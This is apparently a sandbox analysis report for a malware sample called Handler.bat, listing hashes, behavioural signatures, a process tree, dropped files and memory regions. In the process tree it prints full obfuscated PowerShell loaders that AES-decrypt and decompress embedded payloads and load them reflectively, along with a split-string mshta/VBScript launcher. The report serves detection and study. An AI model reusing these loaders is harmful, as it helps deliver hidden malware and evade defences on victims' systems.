Overview

overview

10

Static

static

10

Release/Ha...er.bat

windows7-x64

7

Release/Ha...er.bat

windows10-1703-x64

10

Release/Ha...er.bat

windows10-2004-x64

10

Release/Ha...er.bat

windows11-21h2-x64

10

Release/Va...at.exe

windows7-x64

8

Release/Va...at.exe

windows10-1703-x64

10

Release/Va...at.exe

windows10-2004-x64

10

Release/Va...at.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    60s
  • max time network
    19s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    18-08-2024 13:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Release/Handlers/Handler.bat

  • Size

    12.7MB

  • MD5

    e154d92aa7ecd7728940f32bb2c82cc6

  • SHA1

    b004e191ae993b3deab2d77c6f99c64e5de55672

  • SHA256

    37be53a96145cd6ad7557e95d85a256377af9d9e126538a4733ebde178254cc5

  • SHA512

    b8b822fc4d8295a59700b7750fff7841f56ed877207e622dd7d7b0435ce737f212d5f754c95f2329b87e83c1ae796b07724276473256d8787f0f87b1871121e4

  • SSDEEP

    49152:Fh5PUtdFBcAJU7Ygqef4u6NE6BGzp3OtWxgusC7QG5r0Wn9O3oGpWJtPS1P8keqj:4

Score
10/10
defense_evasion

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

    defense_evasion
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:592
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{23c621aa-c62a-4f76-a3f3-8649b062a849}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{575ae588-542b-4055-8c53-3889cbfc47d9}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1048
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
        "Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2284
        • C:\Windows\SysWOW64\dllhost.exe
          C:\Windows\SysWOW64\dllhost.exe /Processid:{e83bb8f9-a68a-4d3d-86e9-ad9c86c68f3f}
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4544
        • C:\Windows\SysWOW64\dllhost.exe
          C:\Windows\SysWOW64\dllhost.exe /Processid:{7f946606-f3f4-4359-8927-7cef8af0882f}
          3⤵
            PID:1452
          • C:\Windows\SysWOW64\dllhost.exe
            C:\Windows\SysWOW64\dllhost.exe /Processid:{2c584f31-3b18-4797-aa2d-cf346a1045a5}
            3⤵
              PID:2812
            • C:\Windows\SysWOW64\dllhost.exe
              C:\Windows\SysWOW64\dllhost.exe /Processid:{4c2587e7-63b4-4603-8c1e-fc8da29766c3}
              3⤵
                PID:1128
              • C:\Windows\SysWOW64\dllhost.exe
                C:\Windows\SysWOW64\dllhost.exe /Processid:{73526fce-b2c6-443a-9feb-27e802959c79}
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1592
          • C:\Windows\$sxr-mshta.exe
            C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
            1⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:4736
            • C:\Windows\$sxr-cmd.exe
              "C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4148
              • C:\Windows\$sxr-powershell.exe
                C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
                3⤵
                • Executes dropped EXE
                • Hide Artifacts: Hidden Window
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2252

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
            Filesize

            435KB

            MD5

            f7722b62b4014e0c50adfa9d60cafa1c

            SHA1

            f31c17e0453f27be85730e316840f11522ddec3e

            SHA256

            ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

            SHA512

            7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbn1qp2l.tbv.ps1
            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

            Download Submit

          • C:\Windows\$sxr-cmd.exe
            Filesize

            265KB

            MD5

            94912c1d73ade68f2486ed4d8ea82de6

            SHA1

            524ab0a40594d2b5f620f542e87a45472979a416

            SHA256

            9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9

            SHA512

            f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

            Download Submit

          • C:\Windows\$sxr-mshta.exe
            Filesize

            14KB

            MD5

            98447a7f26ee9dac6b806924d6e21c90

            SHA1

            a67909346a56289b7087821437efcaa51da3b083

            SHA256

            c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

            SHA512

            c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

            Download Submit

          • memory/2252-148-0x000002BF74BB0000-0x000002BF74CE8000-memory.dmp

            Filesize

            1.2MB

            Download

          • memory/2252-142-0x00007FF8A1910000-0x00007FF8A19BE000-memory.dmp

            Filesize

            696KB

            Download

          • memory/2252-141-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp

            Filesize

            1.9MB

            Download

          • memory/2252-138-0x000002BF74390000-0x000002BF743B4000-memory.dmp

            Filesize

            144KB

            Download

          • memory/2284-35-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp

            Filesize

            1.9MB

            Download

          • memory/2284-10-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-32-0x00000185A8000000-0x00000185A8024000-memory.dmp

            Filesize

            144KB

            Download

          • memory/2284-37-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-38-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-39-0x00007FF884DD3000-0x00007FF884DD4000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2284-40-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-41-0x0000018598290000-0x0000018598CE0000-memory.dmp

            Filesize

            10.3MB

            Download

          • memory/2284-43-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-44-0x0000018598CE0000-0x0000018598D86000-memory.dmp

            Filesize

            664KB

            Download

          • memory/2284-59-0x0000018598D90000-0x0000018598DE6000-memory.dmp

            Filesize

            344KB

            Download

          • memory/2284-60-0x0000018598DF0000-0x0000018598E48000-memory.dmp

            Filesize

            352KB

            Download

          • memory/2284-61-0x0000018598E50000-0x0000018598E72000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2284-64-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp

            Filesize

            1.9MB

            Download

          • memory/2284-73-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-152-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp

            Filesize

            1.9MB

            Download

          • memory/2284-153-0x00007FF8A1910000-0x00007FF8A19BE000-memory.dmp

            Filesize

            696KB

            Download

          • memory/2284-4-0x00007FF884DD3000-0x00007FF884DD4000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2284-72-0x0000018599100000-0x000001859910A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/2284-79-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-147-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-82-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-27-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-16-0x00000185EED80000-0x00000185EEDF6000-memory.dmp

            Filesize

            472KB

            Download

          • memory/2284-15-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-36-0x00007FF8A1910000-0x00007FF8A19BE000-memory.dmp

            Filesize

            696KB

            Download

          • memory/2284-9-0x00000185EE970000-0x00000185EE992000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2284-145-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2284-146-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/3432-74-0x0000000140000000-0x0000000140004000-memory.dmp

            Filesize

            16KB

            Download

          • memory/3432-76-0x0000000140000000-0x0000000140004000-memory.dmp

            Filesize

            16KB

            Download

          • memory/4544-81-0x0000000000400000-0x0000000000406000-memory.dmp

            Filesize

            24KB

            Download

          • memory/4544-78-0x0000000000400000-0x0000000000406000-memory.dmp

            Filesize

            24KB

            Download